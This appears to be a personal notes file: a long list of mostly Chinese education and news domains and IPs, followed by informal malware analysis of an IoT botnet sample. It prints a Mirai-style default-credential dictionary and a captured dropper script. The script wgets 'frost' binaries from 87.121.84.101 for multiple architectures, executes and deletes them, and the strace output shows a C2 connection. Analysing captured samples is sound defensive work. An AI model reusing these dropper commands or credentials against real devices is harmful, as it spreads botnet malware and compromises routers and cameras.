.53kf.com
.tumanduo.com
.022net.com
.zhulong.com
.titan24.com
.jiatx.com
.baa.com
.dongfeng-nissan.com
.eatsun.com
.ttmeishi.com
.ichide.cn
.woocai.cn
.bettyskitchen.com
taobaocdn\.com
.zjedu.org
.520wawa.com
.zdedu.org
.jdedu.org
.eduzj.org
.zjol.com.cn
.311100.com
.360safe.com
.51653112.cn
.51jishu.com
.52xlxx.cn
.87188718.com
.afeng.js.cn
.ajedu.com
.am810.cn
.bctsy.net
.bledu.net.cn
.blyey.com
.boluxx.com
.bxedu.org
.cababy.cn
.cae.cn
.caqxzx.com
.cas.cn
.casyxx.com
.catvu.com
.cawpzx.com
.cawpzz.com
.cc.zj.cn
.cey68.com
.changhuazx.zj.cn
.chinaacademyofart.com
.chinaguotai.com
.chinahztv.com
.chinamor.cn.net
.chinataiwan.org
.chinazime.com
.chsyxx.com
.chunj.net
.chwedu.com
.chzg.com
.cisco.com
.citic-daxie.com
.cixiedu.net
.cnbb.com.cn
.cnjyw.net
.cnluye.com
.cnnb.com.cn
.cnnb.net
.cnxaj.com
.cnzjetp.com
.csedu.com.cn
.cx2004.cn
.cztv-3.com
.cztv4.com
.cztv6.com
.cztv7.com
.dfzx.net
.dgex.net
.dgyyx.com
.dhyedu.com
.dqjy.cn
.dsschool.cn
.dxgzx.com
.dyedu.net
.eastday.com
.echinagov.com
.edufs.com
.edutv.net.cn
.eeshu.com
.e-gov.org.cn
.ejobmart.cn
.etimeweekly.com
.eyh.cn
.fcgz.net
.fhedu.net.cn
.fm1054.com
.fm918.net
.fscz.net
.fyedu.org
.gcqxx.com
.gdyx.net
.glcz.com
.gotohz.com
.gsedu.cn
.gsjy.net
.gslxx.com
.gsqsn.com
.gszg.cn
.guangshaxy.com
.gxedu.org
.gzsedu.cn
.h13z.net
.h14z.com
.h15z.net
.h3c.com.cn
.hanggao.net
.hangtu.com
.hangzhou.com.cn
.hccjzx.cn
.heda.gov.c
.hee.cn
.hefls.com
.hhzx.net
.hjgz.net
.hjz.com.cn
.hlje.net
.hsddlsy.com
.hsdfz.net
.hsedu.com.cn
.hsfx1st.com
.hshz.com
.hsyz.cn
.huameiedu.com
.huedu.net
.hutc.zj.cn
.hxjy.com
.hyedu.com
.hyedu.net
.hz2hs.com.cn
.hz2hs.net.cn
.hz2sl.com
.hz4z.com
.hz66.com
.hzart.net
.HZBA.NET
.hzbjzg.org
.hzbwxx.com
.hzbysyzx.com
.hzce.com.cn
.hzchcx.com
.hz-chgz.com
.hzchxx.cn
.hzchxx.com
.hzchzx.cn
.hzcl.org.cn
.hzcnc.com
.hzcxzx.com
.hzcyfx.cn
.hzcyyx.com
.hzcyzx.net
.hzczzx.com
.hzda.zj001.net
.hzdgzx.net
.hzedu.net
.hzfc.com.cn
.hzff.cn
.hzfzzg.cn
.hzgh.org
.hzhmxx.com
.hzhyyey.com
.hzjbxx.com
.hzjbzx.com
.hzjf.net
.hzjlxx.com
.hzjnsy.com
.hzjtzg.net
.hzjys.net
.hzkysm.com
.hzland.com
.hzlcyh.com
.hzlpsz.com
.hzlw.com
.hzlxxx.com
.hzlxzx.com
.hzlyzx.com
.hzmyqxx.net
.hzpbex.com
.hzpbyx.com
.hzpjxx.net
.hzpress.com
.hzptc.com
.hzpxxx.com
.hzpyzx.com
.hzpyzx.net
.hzqn.net
.hzqszg.com
.hzqx.com
.hzqz.com
.hzrc.com
.hzrtg.com
.hzscjy.com
.hzscsj.com
.hzsdgxx.com
.hzsdzx.net
.hzsf.gov.c
.hzsgz.com
.hzshxzx.cn
.hzsly.com
.hzsrmzfzsb.com
.hzsszx.com
.hzstb.com
.hzthxx.net
.hztmhs.com
.hztv2.com
.hztv4.com
.hztwjt.com
.hztyh.com
.hzvtc.net
.hzwestlake.com
.hzwhzx.com
.hzwlhs.com
.hzwmw.com
.hzwtxx.com
.hzwys.com
.hzxd.cn
.hzxjhs.com
.hzxjxx.com
.hzxlzg.net
.hzxsex.com
.hzxsj.com
.hzxszx.com
.hzxxsy.com
.hzxxzx.com
.hzxyzx.com
.hzxzxx.cn
.hzxzxx.com
.hzxzzx.net
.hzycedu.com
.hzyczx.com
.hzyhcdc.com
.hzyhfb.com
.hzyhrc.net
.hzyhwy.com
.hzyhxx.com
.hzyhzhx.com
.hzypzx.com
.hzyzzz.com
.hzzdfz.com
.hzzuoan.com
.hzzwxy.com
.hzzyxx.com
.ibm.com
.info.gov.hk
.investzj.com.cn
.iptvzj.com
.itzx.cn
.iurnbedu.net.cn
.jbedu.net
.jbzx.com.cn
.jd.hz.zj.cn
.jdedu.net
.jdhtxx.com
.jdmzxx.com
.jdnews.com.cn
.jdqsng.com
.jdqtzx.com
.jdsljcjzx.cn
.jdssyxx.cn
.jdsx.org.cn
.jdsyxxx.org
.jdtvu.com
.jdxex.org
.jdxzx.com
.jdyc.cn
.jgedu.net
.jgzg.com
.jhc.cn
.jhedu.org
.jhnews.com.cn
.jiangmin.com
.jianlan.com.cn
.jiashanedu.net
.jjedu.com
.jjedu.net
.jxaily.net.cn
.jxedu.net.cn
.jxnyc.net
.jxvtc.net
.jxxzedu.cn
.kcqedu.com
.kfinfo.ha.cn
.khedu.net
.labaobao.com
.lajcsz.com
.lajsjx.com
.lajy.com
.lallzx.com
.lalpxx.com
.laqs.net
.layqyx.com
.layqzx.cn
.lazz.cn
.lcedu.net.cn
.liangzhong.cn
.linhaiedu.cn
.lishangzx.com
.lp2y.com
.lpcx.cn
.lpyey.com
.lpyx.net
.lpyz.com
.lqedu.org
.lqjy.com
.lsnews.com.cn
.lsxy.com
.Lszjy.com
.lwedu.cn
.lxedu.org
.lyedu.net.cn
.macau.gov.mo
.mcdxyey.com
.mmzxxx.com
.moe.eu.cn
.mountor.com
.msit21.com
.music968.com
.nanhuedu.net
.nb7000.net
.nbc.net.cn
.nbcc.cn
.nbchs.net
.nbdfmedia.com
.nbedu.net.cn
.nbepb.cnnb.net
.nbjy.net
.nbjyzb.com
.nbmb.net
.nbptweb.net
.nbqs.net.cn
.nbraio.com
.nbrc.com.cn
.nbyouth.com
.nbyzedu.cn
.netd.com.cn
.nhedu.com.cn
.nit.net.cn
.n-mainstream.com
.nyzxxx.com
.ohedu.net
.ouyuephoto.com
.paedu.net
.pbxx.net
.people.com.cn
.pep.com.cn
.phedu.net
.pjedu.net
.pyedu.cc
.pyex.net
.pyzyz.com
.qdh-cz.cn
.qdhedu.net
.qdhnsxx.net
.qdhzsx.com
.qgjszy.org.cn
.qjqedu.com
.qnsb.com
.qsedu.com
.qtedu.net
.qtzxxx.net
.qzaily.com.cn
.qzc.cn
.qzct.net
.qzedu.net
.raedu.com.cn
.raiohz.com
.rising.com.cn
.rmzx.com
.sbqxx.com
.scedu.net
.schoolbest.com
.seylzx.com
.sflxx.com
.shaoertv.com
.shaoxingaily.com.cn
.shengli.net.cn
.shidaixx.com
.shijing.net
.shouzhong.net
.sjqxx.com
.smedu.org
.ssjy.net
.sskbaby.cn
.sxsedu.net
.sxtopxy.com.cn
.sxxedu.com
.syjy.cn
.symantec.com
.szedu.org
.taizhou.com.cn
.tczj.net
.tdsy.org
.teamuseum.cn
.thsyxx.com
.tianchang.org
.tjkjxy.com
.tledu.net
.tlez.net
.tlfcxx.net
.tljncz.com
.tlshzx.com
.tlsyxx.net
.tlzjx.net
.tqsz.com
.tqzx.com.cn
.trendmicro.com.cn
.tsedu.com.cn
.tt.cn
.ttedu.org
.tv.cn
.txzg.com
.tyjk.net
.tyxx100.com
.tzedu.net.cn
.tzgov.org.cn
.tzvcst.net
.tzvtc.com
.wcedu.org
.whhxx.cn
.whsyxx.com
.wledu.org
.wsjxx.com
.wuca.net
.wxpoly.cn
.wyedu.net
.wyjxx.com
.wypre.com.cn
.wzer.net
.wzmc.net
.wzrb.com.cn
.wzsb.com.cn
.wzvcst.cn
.wzvtc.cn
.wzwb.com.cn
.xajdyxx.com
.xajez.com
.xajol.com.cn
.xajzx.net
.xhblog.com
.xhedu.net
.xhgjzx.net
.xhschool.com
.xhzg.net
.xinhua.org
.xizischool.com
.xjedu.org
.xsedu.net.cn
.xsedu.zj.cn
.xsjsyxx.cn
.xtmzx.com
.xxysy.com
.xzhxx.com
.ycqedu.net
.yerg.net
.yhaxzx.com
.yhclub.com
.yhedu.net
.yhfh.com
.yhjy.net
.yhqn.com
.yhrtvu.com
.yhslxx.net
.yhslzx.cn
.yhsyzx.com
.yhtv.com.cn
.yhweb.net
.yhwhxx.com
.yhwt.com
.yhxlxx.com
.yhycxx.com
.yhzsb.home.sunbo.net
.yhztxx.com
.yhzyz.net
.yje.cn
.ykedu.net
.yongjinzx.com
.yqer.cn
.yqzex.com
.yqzx.com
.yqzzx.com
.yucaischool.com
.yunhuayoueryuan.com
.yu-tu.com
.ywu.cn
.yxc.cn
.yyedu.org
.yz.zj.cn
.zaobao.com
.zctp.com
.zczyedu.net
.zdyj.cn
.zhedu.net.cn
.zhoushan.cn
.zimc.cn
.zj.xinhua.org
.zj315.org
.zjaily.com.cn
.zj-art.com
.zjbti.net.cn
.zjca.com.cn
.zjcaez.com
.zjcg.com
.zjcl.com.cn
.zjcourt.cn
.zjcs.net.cn
.zjcxedu.net
.zjczxy.cn
.zjdfc.com
.zjdly.com
.zjedusri.com.cn
.zjevtc.cn
.zjfc.com.cn
.zjff.net
.zjgmls.net
.zjgrrb.com
.zjhnedu.com
.zjhxx.com
.zjhzyg.net
.zjipc.com
.zjitc.net
.zjjcxy.cn
.zjjnedu.cn
.zjjy.com
.zjjy.com.cn
.zjjy.net
.zjjyedu.org
.zjjys.org
.zjjyzb.com
.zjks.com
.zjlazx.com
.zjlsedu.org
.zjmc.net.cn
.zjosta.org.cn
.zjphis.com
.zjpsc.com
.zjpx.com.cn
.zjqyjy.com
.zjrc.com
.zjrecross.org.cn
.zjscazx.net
.zjscb.com
.zjscedu.org
.zjsru.cn
.zjstv.com
.zjsw.cn
.zjsyjy.org
.zjsyzzx.com
.zjszy.net
.zjtcm.net
.zjtlzx.com
.zjtxedu.org
.zjul.com.cn
.zjwchc.com
.zjwxedu.cn
.zjyhedu.org
.zjyhtour.com
.zjyyc.com
.zjzs.net
.zmctc.com
.zphc.net
.zs510.com
.zslyey.com
.ztv-2.com
.ztv-5.com
.ztxx.org
10.1.52.247
10.3.48.2
10.3.55.1
10.8.124.252
10.8.48.146
211.81.22.65
218.108.1.226
218.108.1.230
218.108.1.234
218.108.1.238
218.108.1.246
218.108.14.2
218.108.2.194
218.108.2.222
218.108.2.226
218.108.2.234
218.108.22.85
218.108.24.206
218.108.46.77
218.108.72.9
218.75.121.254
218.75.77.173
220.191.161.29
221.12.29.157
.xinhuanet.com
baishui\.igrow\.cn
chinamobile\.com
comer\.xhblog\.com
cyc90\.cycnet\.com
edu\.cacnc\.cn
gov\.hnedu\.com
gyx\.stcvs\.com
hangzhou\.chinaecai\.com
hzcyex\.vicp\.net
hzsc\.qsng\.cn
hzsjysfx\.vicp\.net
hzxxsy\.ktxedu\.com
hzzpzx\.vicp\.net
hzzy\.igrow\.cn
jdsjgyey\.igrow\.cn
jiande\.bookuu\.com
jkfx\.org
jkzg\.lajy\.com
lgzx\.jimdo\.com
lqedu\.hzs\.cn
lyyey\.bbshow\.com\.cn
nc\.linkwan\.com
nd\.cnnb\.com\.cn
nsb\.cnnb\.com\.cn
nx\.huedu\.net
nxedu\.com
qyxx\.lajy\.com
sbqyey\.bbshow\.com\.cn
tianyi\.igrow\.cn
tsjy\.lajy\.com
welcome\.hp\.com
whhy\.igrow\.cn
xajdeyey\.igrow\.cn
ywec\.net
ztxiaoxue\.vicp\.net
ztyey\.igrow\.cn
zxm\.xhschool\.com
zzw\.hzedu\.net
zzw\.hzedu\.net
my optical modem became a brick!
but I had backup.
https://github.com/bytecategory/gfw/blob/main/mtd11.bin
I will publish an article on http://bytecategory.blogspot.com about upnp for optical modems
weak password dictionary used by Mirai malware
Through dmesg and /proc/13181/exe
I capture so called qemu,but actually it is actually not.
I execute a command
strings qemu
The output is
...
root
Pon521
Zte521
root621
vizxv
oelinux123
wabjtam
Zxic521
tsgoingon
123456
xc3511
solokey
default
a1sev5y7c39k
hkipc2016
unisheen
Fireitup
hslwificam
jvbzd
1001chin
system
zlxx.
admin
7ujMko0vizxv
1234horses
antslq
xc12345
xmhdipc
icatch99
founder88
xirtam
taZz@01
/*6.=_ja
12345
t0talc0ntr0l4!
7ujMko0admin
telecomadmin
ipcam_rt5350
juantech
1234
dreambox
IPCam@sw
zhongxing
hi3518
hg2x0
dropper
ipc71a
root123
telnet
ipcam
grouter
GM8182
20080826
3ep5w2u
uFwfBht5
VnT3ch@dm1n
admin123
admin1234
admin@123
BrAhMoS@15
GeNeXiS@19
firetide
2601hx
service
password
supportadmin
telnetadmin
admintelecom
guest
video
user
nobody
daemon
1cDuLJ7c
tlJwpbo6
S2fGqNFs
OxhlwSG8
lJwpbo6
tluafed
vstarcam2015
20150602
support
hikvision
e8ehomeasb
e8ehome
e8telnet
cisco
...
I also referred to Anity Lab
The end
SHA1: c9151badebad2dac66dedea508f0b7bf2c1baa2a
dvr.lilin.sh
I capture a malware sample frost.armv7
cd /tmp || cd /var/tmp || cd /var || cd /mnt || cd /dev || cd /
wget http://87.121.84.101/frost.armv7; chmod 777 frost.armv7; ./frost.armv7 dvr.lilin; rm frost.armv7
wget http://87.121.84.101/frost.armv6; chmod 777 frost.armv6; ./frost.armv6 dvr.lilin; rm frost.armv6
wget http://87.121.84.101/frost.armv5; chmod 777 frost.armv5; ./frost.armv5 dvr.lilin; rm frost.armv5
wget http://87.121.84.101/frost.mips; chmod 777 frost.mips; ./frost.mips dvr.lilin; rm frost.mips
wget http://87.121.84.101/frost.mipsel; chmod 777 frost.mipsel; ./frost.mipsel dvr.lilin; rm frost.mipsel
wget http://87.121.84.101/frost.aarch64; chmod 777 frost.aarch64; ./frost.aarch64 dvr.lilin; rm frost.aarch64
wget http://87.121.84.101/frost.x86; chmod 777 frost.x86; ./frost.x86 dvr.lilin; rm frost.x86
wget http://87.121.84.101/frost.x86_64; chmod 777 frost.x86_64; ./frost.x86_64 dvr.lilin; rm frost.x86_64
As for now
strace -f qemu-arm ./frost.armv7
Key Code
write(1, "pwned :3", 8)
connect(4, {sa_family=AF_INET, sin_port=htons(5555), sin_addr=inet_addr("144.172.103.124")}, 16)
unlink("./frost.armv7") # the reason I stop